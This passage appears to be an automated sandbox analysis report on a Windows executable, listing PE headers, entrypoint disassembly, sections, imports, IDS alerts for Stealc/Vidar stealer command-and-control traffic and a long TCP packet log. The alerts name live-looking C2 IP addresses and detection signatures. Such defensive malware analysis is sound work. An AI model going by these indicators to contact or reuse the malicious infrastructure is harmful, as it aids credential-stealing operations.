                                                                                                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                                                                                        Import Hash:ff9f3a86709796c17211f9df12aae74d

                                                                                                                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                                                                                                        jmp 00007F915D043660h
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+10h], ebp
                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+14h], esi
                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+18h], edi
                                                                                                                                                                                                                                                                                                                                                        mov esi, eax
                                                                                                                                                                                                                                                                                                                                                        mov edx, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                                                                                                                                        cmp edx, 00000000h
                                                                                                                                                                                                                                                                                                                                                        jne 00007F915D0459A9h
                                                                                                                                                                                                                                                                                                                                                        mov eax, 00000000h
                                                                                                                                                                                                                                                                                                                                                        jmp 00007F915D045A06h
                                                                                                                                                                                                                                                                                                                                                        mov edx, dword ptr [edx+00000000h]
                                                                                                                                                                                                                                                                                                                                                        cmp edx, 00000000h
                                                                                                                                                                                                                                                                                                                                                        jne 00007F915D0459A7h
                                                                                                                                                                                                                                                                                                                                                        call 00007F915D045A99h
                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+20h], edx
                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+24h], esp
                                                                                                                                                                                                                                                                                                                                                        mov ebx, dword ptr [edx+18h]
                                                                                                                                                                                                                                                                                                                                                        mov ebx, dword ptr [ebx]
                                                                                                                                                                                                                                                                                                                                                        cmp edx, ebx
                                                                                                                                                                                                                                                                                                                                                        je 00007F915D0459BAh
                                                                                                                                                                                                                                                                                                                                                        mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [ebp+00000000h], ebx
                                                                                                                                                                                                                                                                                                                                                        mov edi, dword ptr [ebx+1Ch]
                                                                                                                                                                                                                                                                                                                                                        sub edi, 28h
                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [edi+24h], esp
                                                                                                                                                                                                                                                                                                                                                        mov esp, edi
                                                                                                                                                                                                                                                                                                                                                        mov ebx, dword ptr [ecx]
                                                                                                                                                                                                                                                                                                                                                        mov ecx, dword ptr [ecx+04h]
                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [esp], ebx
                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+04h], ecx
                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+08h], edx
                                                                                                                                                                                                                                                                                                                                                        call esi
                                                                                                                                                                                                                                                                                                                                                        mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                                                                                                        mov esp, dword ptr [esp+24h]
                                                                                                                                                                                                                                                                                                                                                        mov edx, dword ptr [esp+20h]
                                                                                                                                                                                                                                                                                                                                                        mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                                                                                                                                        mov dword ptr [ebp+00000000h], edx
                                                                                                                                                                                                                                                                                                                                                        mov edi, dword ptr [esp+18h]
                                                                                                                                                                                                                                                                                                                                                        mov esi, dword ptr [esp+14h]
                                                                                                                                                                                                                                                                                                                                                        mov ebp, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                                                                                                        mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                                                                                                                                                                        retn 0004h
                                                                                                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                                                                                                        mov edx, dword ptr [ecx]
                                                                                                                                                                                                                                                                                                                                                        mov eax, esp

                                                                                                                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x19400000x410.idata
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x19e50000x2160.rsrc
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x19410000xa26a6.reloc
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x17034800xa8.data
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                                                        .text0x10000xbf83f50xbf8400f5b5b140fbae3d4d2a2f5432d9788ddaunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                        .rdata0xbfa0000xb028d40xb02a0019772c7d0f0d0e74b9d084d113f2ec1funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                        .data0x16fd0000x2422ec0x1fd4002bd0495cd8cbe635fa30367375992cc6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                                        .idata0x19400000x4100x6000941897b2203b75df6027d208b32f264False0.3359375data3.7846389634055217IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                                        .reloc0x19410000xa26a60xa2800888fbc0912920b5ee6b643cdc8e85a5bFalse0.5326246995192307data6.681772258008935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                        .symtab0x19e40000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                        .rsrc0x19e50000x21600x22005054d5a060ed1cc59bf06ce1d28d2363False0.31594669117647056data4.697583439460509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x19e51d40x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5675675675675675
                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x19e52fc0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4486994219653179
                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x19e58640x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4637096774193548
                                                                                                                                                                                                                                                                                                                                                        RT_ICON0x19e5b4c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3935018050541516
                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x19e63f40x3edataEnglishUnited States0.8387096774193549
                                                                                                                                                                                                                                                                                                                                                        RT_VERSION0x19e64340x584dataEnglishUnited States0.2804532577903683
                                                                                                                                                                                                                                                                                                                                                        RT_MANIFEST0x19e69b80x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                                                                                                                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                                                                                                        kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetThreadPriority, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateWaitableTimerA, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                                                                                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                                        2024-11-14T15:25:48.791498+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.0.159443192.168.2.549864TCP
                                                                                                                                                                                                                                                                                                                                                        2024-11-14T15:25:50.283580+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.549875116.203.0.159443TCP
                                                                                                                                                                                                                                                                                                                                                        2024-11-14T15:25:50.284090+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.0.159443192.168.2.549875TCP
                                                                                                                                                                                                                                                                                                                                                        2024-11-14T15:26:50.216588+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550137185.166.143.49443TCP
                                                                                                                                                                                                                                                                                                                                                        2024-11-14T15:27:02.768520+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550140185.166.143.49443TCP
                                                                                                                                                                                                                                                                                                                                                        2024-11-14T15:29:47.538600+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.55015551.105.71.136443TCP

                                                                                                                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:24:55.130393982 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:24:55.271109104 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:24:55.271109104 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:04.734267950 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:04.874572992 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:04.874768019 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:06.600531101 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:06.600682974 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:15.707894087 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:15.707993031 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:15.708076000 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:15.710422993 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:15.710462093 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.517463923 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.517539024 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.519591093 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.519603968 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.519969940 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.568690062 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.838291883 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.838325977 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.838386059 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.838655949 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.838668108 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.532387972 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.575367928 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.601121902 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.601227999 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.604551077 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.604578018 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.604976892 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.613565922 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.659331083 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791136980 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791249037 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791269064 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791367054 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791383982 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791419029 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791433096 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791457891 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791459084 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791459084 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791477919 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791492939 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791551113 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791564941 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791570902 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791953087 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.792011976 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.855839968 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.855881929 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.855902910 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.855951071 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.855966091 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.856035948 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.856065035 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.972218037 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.972259045 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.972287893 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.972301960 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.972333908 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.972351074 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.088836908 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.088896036 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.088926077 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.088944912 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.088958979 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.088983059 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.202660084 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.202688932 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.202739954 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.202755928 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.202810049 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.320139885 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.320183039 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.320235968 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.320250988 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.320291042 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.320301056 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.435936928 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.435988903 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.436029911 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.436045885 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.436074972 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.436083078 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.562316895 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.562347889 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.562479019 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.562479019 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.562495947 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.562562943 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.669336081 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.669368982 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.669478893 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.669478893 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.669496059 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.669553041 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.693890095 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.693890095 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.693926096 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.693942070 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.756150961 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.756206989 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.756246090 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.756262064 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.756295919 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.756366014 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.830451965 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.830495119 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.830528021 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.830543995 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.830599070 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.830599070 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.901231050 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.901274920 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.901387930 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.901387930 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.901405096 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.901531935 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.015897036 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.015935898 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.015971899 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.015986919 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.016036034 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.016099930 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.103511095 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.103543043 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.103648901 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.103648901 CET49707443192.168.2.513.107.246.45
